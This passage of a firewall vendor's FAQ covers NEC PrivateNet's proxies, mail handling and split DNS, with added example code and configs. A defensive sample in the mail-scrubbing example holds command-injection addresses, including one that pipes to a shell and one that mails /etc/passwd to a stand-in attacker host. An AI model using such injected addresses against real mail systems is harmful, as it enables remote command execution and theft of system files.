  • Hardware: One year on-site warranty of all hardware components. After the first year, you may purchase a hardware maintenance contract through your VAR.
  • Software: Software support includes bug fixes, updates, and bulletins.

Up to Contents

Q36. How are upgrades handled?

A. The PrivateNet server software is upgraded by simply replacing the old CD-ROM with a new one. Upgrades will be announced by NEC and provided automatically to authorized VARs. The VARs will supply the upgrade to their customers.

Up to Contents


OTHER PRIVATENET QUESTIONS

Q37. Does SocksPlus support UDP?

A. Yes. SocksPlus supports UDP, but for security reasons it is implemented as UDP over TCP: the client's datagrams are carried to the server inside its SocksPlus TCP connection. While filtering TCP circuits is difficult at best, securely filtering UDP is far harder. The difficulty lies in the difference between the two protocols. TCP implements a virtual circuit and keeps a context for the connection that the firewall can track, whereas UDP is a datagram protocol in which each packet is an independent message with no context to check it against.

Providing UDP over TCP simplifies the implementation of the UDP relays significantly, and removes most of the problems normally experienced in providing UDP support through a firewall.

While this strategy may be less efficient than a native UDP implementation, its simplicity and ease of security management by far justify the additional overhead. NEC believes the difference in performance for a reliable and safe native UDP solution would be negligible.

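The relay framing below is an added example written for this FAQ, not SocksPlus code. The header layout (payload length, destination address, destination port) is an assumption about how a UDP-over-TCP relay might carry datagrams; the SocksPlus wire format is not described on this page. It shows the point the answer makes: once datagrams ride a TCP circuit, the relay has one connection, with a known client, on which to make and log its decisions, and the remaining work is to restore the message boundaries that a byte stream does not preserve.

```python
import socket
import struct
from typing import Iterator, List, Tuple

# Assumed framing (not SocksPlus's format): 2-byte big-endian payload length,
# 4-byte IPv4 destination address, 2-byte destination port, then the datagram.
HEADER = struct.Struct("!H4sH")
MAX_DATAGRAM = 65507  # largest UDP payload that fits in one IPv4 packet


def encode_datagram(dst_ip: str, dst_port: int, payload: bytes) -> bytes:
    """Wrap one UDP datagram for transmission over the relay's TCP circuit."""
    if len(payload) > MAX_DATAGRAM:
        raise ValueError("datagram too large for UDP")
    return HEADER.pack(len(payload), socket.inet_aton(dst_ip), dst_port) + payload


class FrameDecoder:
    """Reassemble datagrams from a TCP byte stream.

    A stream socket may hand the receiver any prefix of the data, so a frame
    can arrive split across reads or several frames can arrive in one read.
    """

    def __init__(self) -> None:
        self._buf = b""

    def feed(self, chunk: bytes) -> Iterator[Tuple[str, int, bytes]]:
        self._buf += chunk
        while len(self._buf) >= HEADER.size:
            length, raw_ip, port = HEADER.unpack_from(self._buf)
            if length > MAX_DATAGRAM:
                # A peer lying about the length cannot be trusted further;
                # the relay should drop the whole circuit, not just the frame.
                raise ValueError("oversized frame; drop the circuit")
            end = HEADER.size + length
            if len(self._buf) < end:
                return  # wait for the rest of this frame
            payload = self._buf[HEADER.size:end]
            self._buf = self._buf[end:]
            yield socket.inet_ntoa(raw_ip), port, payload


def demo() -> List[Tuple[str, int, bytes]]:
    """Constructed sample: two datagrams on one circuit, delivered in three
    arbitrary chunks as a stream socket might split them."""
    stream = (encode_datagram("192.0.2.53", 53, b"dns-query-1")
              + encode_datagram("192.0.2.123", 123, b"ntp"))
    decoder = FrameDecoder()
    received: List[Tuple[str, int, bytes]] = []
    for chunk in (stream[:5], stream[5:20], stream[20:]):
        received.extend(decoder.feed(chunk))
    return received


if __name__ == "__main__":
    for ip, port, data in demo():
        print(f"datagram for {ip}:{port}: {data!r}")
```

The length check before buffering is the part a relay cannot skip: an attacker who controls the header can otherwise make the relay allocate and wait for a frame that never completes.
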
Up to Contents

Q38. Will SocksPlus clients connect from the Internet?

A. The server provides a simple and very secure method to determine which interfaces will support client connections, and is one of the many places where a "belt and suspenders" design philosophy has been used for the PrivateNet server.

In its recommended configuration the server will allow client connections only from the internal network, while outside connections will be rejected. The configuration provides a simple mechanism that allows the server administrator to specify which interfaces should accept SOCKS 4.2 and SocksPlus client connections. If a client attempts to connect to an interface that is not configured to accept client connections, the server will reject the connection and log the connection attempt.

Up to Contents

Q39. What is the Telnet proxy?

A. The Telnet proxy provides a secure means to allow users to log into internal hosts from the Internet. When a user Telnets to the PrivateNet server, the user is required to authenticate before being allowed to connect to an internal host. The Telnet proxy has been designed to ensure good user authentication, which is based on a challenge/response server. SNK from Digital Pathways is supported in PrivateNet Server Release 1.0, and other mechanisms will be added in future releases.

Up to Contents

Q40. What is the HTTP proxy?

A. The HTTP proxy is primarily intended to export internal servers to the outside network. User access to external HTTP servers is better provided through SocksPlus proxy.

Up to Contents

Q41. What is the NNTP proxy?

A. The NNTP proxy allows an internal Usenet News server to be connected to outside servers.

Up to Contents

Q42. How does the SMTP (e-mail) proxy work?

A. The PrivateNet server provides a simple SMTP mail exchanger for e-mail connectivity between internal and external hosts. All mail passes through the PrivateNet server in three steps:

  1. The SMTP proxy receives the e-mail and stores it in a spool directory on the hard disk. This program has been kept as simple as possible to prevent attacks through e-mail.
  2. The postmaster program picks up the spooled mail, rewrites every occurrence of a shell metacharacter found in the address portion of the mail, and hands the result to Sendmail for delivery.
  3. Sendmail delivers the mail in the usual manner.

The advantage of this strategy is that it isolates Sendmail, a common source of security problems, from the network while still using it as a mail delivery agent. It keeps the SMTP proxy mechanism simple and does not require reimplementation of the address rewrite and delivery mechanisms.

This implementation has the following advantages:

  • Server administrators familiar with Sendmail configuration can make configuration changes as usual. Because the basic mechanism is unchanged, no new bugs are introduced into this complex server by the proxy.
  • By default the Sendmail configuration on the PrivateNet server uses a simple forwarding strategy. That is, all incoming e-mail is forwarded to a central mail hub or mail exchanger. This moves all user address resolution (such as the alias file) from the firewall to an internal host with easier access. The internal host is, therefore, simpler to maintain. Server administrators with a large user population can implement more complex mail delivery schemes by configuring Sendmail and the name service accordingly.
  • Outgoing mail is delivered in a similar way using the PrivateNet server as a mail relay. In its simplest configuration, this is achieved by having all hosts forward e-mail to the mail hub which, in turn, uses the PrivateNet server as a smart host. (While this scheme is attractive in its simplicity, it is not appropriate for larger sites. However, such sites can keep their current strategy as long as all outgoing mail is delivered to the PrivateNet server.)

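The program below is an added example written for this FAQ, not NEC's postmaster program. It illustrates step 2 of the three-step scheme: rewriting shell metacharacters in the address portion before Sendmail sees them, while leaving the message body untouched. The spool layout (sender and recipient lines, a blank line, then the message) and the exact set of metacharacters are this example's assumptions; the page does not describe either.

```python
from typing import Dict, List

# Characters a shell, or Sendmail's program-delivery path, would interpret.
# Assumed set for this example; the page only says "shell meta characters".
# CR, LF and NUL are included because they can split one address into two.
SHELL_META = frozenset('|&;<>()$`\\"\'*?[]{}\n\r\x00')

# Assumed spool layout (not the PrivateNet spool format): "sender: <addr>" and
# "recipient: <addr>" lines, a blank line, then the message as received.
ADDRESS_KEYS = ("sender", "recipient")


def scrub_address(addr: str) -> str:
    """Rewrite every shell metacharacter in an address to '_' so the token is inert."""
    return "".join("_" if ch in SHELL_META else ch for ch in addr)


def scrub_spool(record: str) -> Dict[str, object]:
    """Clean one spooled message before handing it to Sendmail.

    Only envelope addresses are rewritten; the body is data and passes through
    unchanged. Returns the cleaned envelope, the body, and the original
    addresses that had to be changed (worth logging: these are attack
    attempts, not typos).
    """
    envelope: Dict[str, List[str]] = {key: [] for key in ADDRESS_KEYS}
    changed: List[str] = []
    lines = record.split("\n")
    i = 0
    while i < len(lines) and lines[i] != "":
        key, _, value = lines[i].partition(": ")
        value = value.strip()
        if key in envelope:
            clean = scrub_address(value)
            if clean != value:
                changed.append(value)
            envelope[key].append(clean)
        i += 1
    body = "\n".join(lines[i + 1:])
    return {"envelope": envelope, "body": body, "changed": changed}


# Constructed sample: a hostile sender, a legitimate recipient and a hostile
# recipient of the kind that once turned Sendmail into a remote shell.
SAMPLE_SPOOL = (
    'sender: "|/usr/bin/sh -c id"@evil.example\n'
    "recipient: alice@corp.example\n"
    "recipient: ;mail attacker@evil.example</etc/passwd\n"
    "\n"
    "Subject: hello\n"
    "\n"
    "body text with | and ; that must stay untouched\n"
)


def demo() -> Dict[str, object]:
    """Run the scrubber over the constructed spool record."""
    return scrub_spool(SAMPLE_SPOOL)


if __name__ == "__main__":
    result = demo()
    print("envelope handed to Sendmail:", result["envelope"])
    print("addresses rewritten (log these):", result["changed"])
```

Rewriting rather than rejecting matches what the answer describes; a site that prefers to refuse such mail outright can test the returned `changed` list and bounce the message instead.
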
Up to Contents

Q43. How does the domain name server work?

A. The domain name server on the PrivateNet firewall is configured as a split name server. In this configuration, two tightly-coupled primary name servers are used, one external and one internal, with an appropriate number of secondaries. The software for both name servers is the unmodified standard UNIX name server. The PrivateNet server uses BIND version 4.9.3, which has many security improvements over older versions of the software.

The name server is configured as a traditional name server with the exception that it has information only about the servers connected to the public networks. (Typically this is the PrivateNet server alone). This allows sites on the Internet to obtain the information necessary to connect to the services offered by that site.

Resolution of host names and addresses for the internal hosts is handled by an internal name server, which has all information about the internal hosts. Because the PrivateNet server does not perform any kind of packet forwarding, there is no way for the internal name server to connect to any name server on the outside. Instead, such inquiries are handled through the name server's "forwarders" mechanism, whereby the inquiry is forwarded to the external name server for resolution. Because the external name server can connect to other name servers across the Internet, it resolves the inquiry in its usual manner and returns the result to the internal name server.

Special consideration should be given to the PrivateNet server itself, since it needs to resolve internal host names and addresses while keeping the external name server's cache uncontaminated with this information. The mechanism for this already exists in the resolver library. Because the PrivateNet server has a local resolver configuration file pointing to the internal name servers, all inquiries originating on the PrivateNet server are resolved by those name servers instead of by the name server running on the PrivateNet server.

Up to Contents

Q44. Is running a split name server required?

A. If you do not want to use a split name server, the name server on the PrivateNet server can be configured as a traditional primary or secondary name server with complete information about all internal hosts. However, if configured in that manner, information on all internal hosts would be readily available on the Internet even though these hosts could not be reached directly. This would give crackers a great source of information on the internal networks, which they could use to attack the hosts on those networks.

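As an added illustration of the split configuration described in Q43 and the contrast drawn in Q44, the two BIND 4.9 named.boot files and the resolver file below are example configurations written for this FAQ, not NEC's shipped configuration. The domain corp.example, the internal network 10.0.0.0/8, the internal name server 10.0.0.53, the PrivateNet server's internal interface 10.0.0.1 and its external address 192.0.2.1 are all assumptions; the zone file names are placeholders.

```text
; --- /etc/named.boot on the PrivateNet server (external, public view) ---
; The zone file lists only hosts reachable from the Internet: the firewall
; itself and the MX record pointing at it. No internal host appears here.
directory   /etc/namedb
primary     corp.example            db.corp.example.public
primary     2.0.192.in-addr.arpa    db.192.0.2
cache       .                       db.cache

; --- /etc/named.boot on the internal name server (10.0.0.53) ---
; Complete internal data. Anything this server cannot answer is forwarded to
; the name server on the PrivateNet server, which alone may reach the Internet.
; "forward-only" prevents it from trying root servers it can never reach.
directory   /etc/namedb
primary     corp.example            db.corp.example.internal
primary     10.in-addr.arpa         db.10
cache       .                       db.cache
forwarders  10.0.0.1
options     forward-only

; --- /etc/resolv.conf on the PrivateNet server ---
; The firewall's own lookups go to the internal server, so internal names
; resolve correctly without ever entering the external server's cache.
domain      corp.example
nameserver  10.0.0.53

; --- What Q44 warns against: do not do this on the PrivateNet server ---
; Serving the complete internal zone from the firewall publishes every
; internal host name and address to the Internet:
;   primary   corp.example   db.corp.example.internal
```

A quick check after setup: a zone transfer or host listing requested from outside against 192.0.2.1 should show only the public hosts, while the same request from an internal host against 10.0.0.53 should show the full internal zone.
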
Up to Contents

Send your comments and questions to webmaster@privatenet.nec.com